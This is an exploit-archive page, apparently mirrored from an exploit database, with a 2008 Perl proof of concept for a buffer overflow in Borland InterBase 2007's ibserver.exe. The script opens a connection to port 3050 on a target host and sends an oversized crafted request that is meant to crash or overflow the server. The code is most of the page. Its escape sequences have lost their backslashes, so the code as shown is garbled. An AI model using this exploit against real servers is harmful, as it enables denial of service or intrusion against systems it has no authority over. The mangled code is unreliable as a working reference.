Borland InterBase 2007 ibserver.exe Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Borland InterBase 2007 ibserver.exe Buffer Overflow PoC
# Published : 2008-04-11
# Author : Liu Zhen Hua
# Previous Title : XM Easy Personal FTP Server 5.4.0 (XCWD) Denial of Service Exploit
# Next Title : HP OpenView NNM 7.53 Multiple Remote Vulnerabilities

###############################################################################################################
#                                 POC.pl                                                                   #
###############################################################################################################
#!/usr/bin/perl -w
#Author:  Liu Zhen Hua <alau [at] 163.com>

use IO::Socket;
use strict;
my $host=$ARGV[0];
sub usage {
print "usage: perl poc.pl serveripn";
}
if ($#ARGV < 0) {
usage();
exit();
}
my $victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$host,
                                PeerPort=>3050);
my $pad0 = "x41"x1000;       #"x00x00x03xE8"
my $pad5 = "x43"x16;
my $exploit = "x00x00x00x52xFFxFFxFFxFFx00x00x03xE8".$pad0."x00x00x00x10".$pad5;
print $victim $exploit ;
print " + Malicious  request sent ...n";
sleep(1);
print "Done.n";
close($victim);
exit;

# www.Syue.com [2008-04-11]